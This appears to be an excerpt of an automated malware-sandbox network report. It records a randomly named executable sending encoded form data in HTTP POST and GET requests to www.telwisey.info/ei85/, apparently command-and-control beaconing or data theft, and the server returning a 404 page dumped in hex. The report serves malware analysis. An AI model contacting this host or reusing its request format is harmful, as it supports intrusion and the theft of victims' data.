                Data Raw: 41 5a 4f 54 63 66 65 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 4e 4b 57 2f 30 38 51 37 61 6f 75 35 49 44 46 77 49 77 30 57 2f 34 6a 44 6e 74 36 38 6d 2f 74 69 41 3d 3d
                Data Ascii: AZOTcfex=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.449759199.192.19.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:40.693533897 CEST795OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 63 51 65 67 6b 4f 78 6c 43 6b 35 47 45 62 77 57 33 74 63 79 32 51 77 30 33 63 64 55 38 4d 51 42 59 3d
                Data Ascii: AZOTcfex=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
                Aug 23, 2024 04:20:41.281512976 CEST1236INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:41 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 23, 2024 04:20:41.281532049 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                Aug 23, 2024 04:20:41.281543016 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                Aug 23, 2024 04:20:41.281555891 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                Aug 23, 2024 04:20:41.281572104 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                Aug 23, 2024 04:20:41.281582117 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                Aug 23, 2024 04:20:41.281590939 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                Aug 23, 2024 04:20:41.281605005 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                Aug 23, 2024 04:20:41.281615973 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                Aug 23, 2024 04:20:41.281625986 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
                Aug 23, 2024 04:20:41.286499023 CEST1236INData Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20
                Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.449760199.192.19.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:43.221774101 CEST10877OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 71 35 72 5a 4d 30 2b 4f 6a 59 2f 32 58 53 63 38 47 4d 76 78 6a 6a 45 4c 6a 50 39 77 6b 32 6f 4a 57 56 4e 53 30 68 44 50 38 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 6b 5a 6d 35 57 52 72 78 72 64 41 6b 68 43 70 64 73 43 71 36 6e 58 4f 32 61 78 65 71 71 78 73 71 59 44 4f 79 78 45 6a 2b 61 37 62 75 51 35 6e 77 4a 31 65 6f 48 73 4c 59 51 62 32 31 30 2f 75 7a 6e 66 57 57 44 33 44 6f 66 51 4c 65 55 2f [TRUNCATED]
                Data Ascii: AZOTcfex=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07q5rZM0+OjY/2XSc8GMvxjjELjP9wk2oJWVNS0hDP8g2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GkZm5WRrxrdAkhCpdsCq6nXO2axeqqxsqYDOyxEj+a7buQ5nwJ1eoHsLYQb210/uznfWWD3DofQLeU/c8swQDQLMEHJPu8Oh9b3dVoL2iAc6qieDbFEMFpX/ZJ+HkqLtOHhiekgZsen4K+RIN6Pjr2+R0+dgEMjuyz+lAQY9Hxc95lAZhBLRw9TzSyy76CIvmeGl475JnpFhKg9pV48amtjJySGPr4BSFZxEvzEasOX6z8fdkJRXBgxweOu1pNj/sxb5vIU2uLF9AJJ6QSbjhlfC7ShdnfDp3mhd82PvuZm08IEJPS6EeihzjeGabvPmZgkG++LObAkDusr9oJswpqRKQHxOhHuUEIsOhLd9e7Kq+BUNwHTv72QjB1jCXCwEm787RW/04S0MhJtc6GoYykfsd8dC9FxGjygw5Y7VNDFDacN82rcUch34GOOB+H7nV2GD+vnnyA/cMam9LyY9v9ss/xoYbsxjjB/awRli6yx5y9nJ11vpDWB8dm2WqCczKAV0r/YuHPSlsUTriFl/eREK8rLOxeIHf8Q6jMiWrJruLqaQwT0z7LYoP6E1ntHpn/xS22MtLWVekCaridGquxvyfg1w863y0dD0aIgkSQ8ARKmIGEf3QkJSYv+YiUI6qTYNnsYAd8LAoIwOxiQwYFUb+WQEsX5fEdqfSVnIYMXntGnXY5aIsmQACpuzE8bJoUOBaI84kmkhwsK8806Art9bDLGFlgmJgZiRGxjXRNA0aQtes [TRUNCATED]
                Aug 23, 2024 04:20:43.985950947 CEST1236INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:43 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 23, 2024 04:20:43.985970020 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                Aug 23, 2024 04:20:43.985980988 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                Aug 23, 2024 04:20:43.985991955 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                Aug 23, 2024 04:20:43.986005068 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                Aug 23, 2024 04:20:43.986022949 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                Aug 23, 2024 04:20:43.986036062 CEST224INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r=
                Aug 23, 2024 04:20:43.986073017 CEST1236INData Raw: 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20
                Data Ascii: "7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stro
                Aug 23, 2024 04:20:43.986083984 CEST224INData Raw: 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 53 6d 61 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                Data Ascii: </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle
                Aug 23, 2024 04:20:43.986140966 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                Aug 23, 2024 04:20:43.990900993 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.449761199.192.19.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:45.751596928 CEST511OUTGET /ei85/?AZOTcfex=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:20:46.355967045 CEST1236INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:46 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
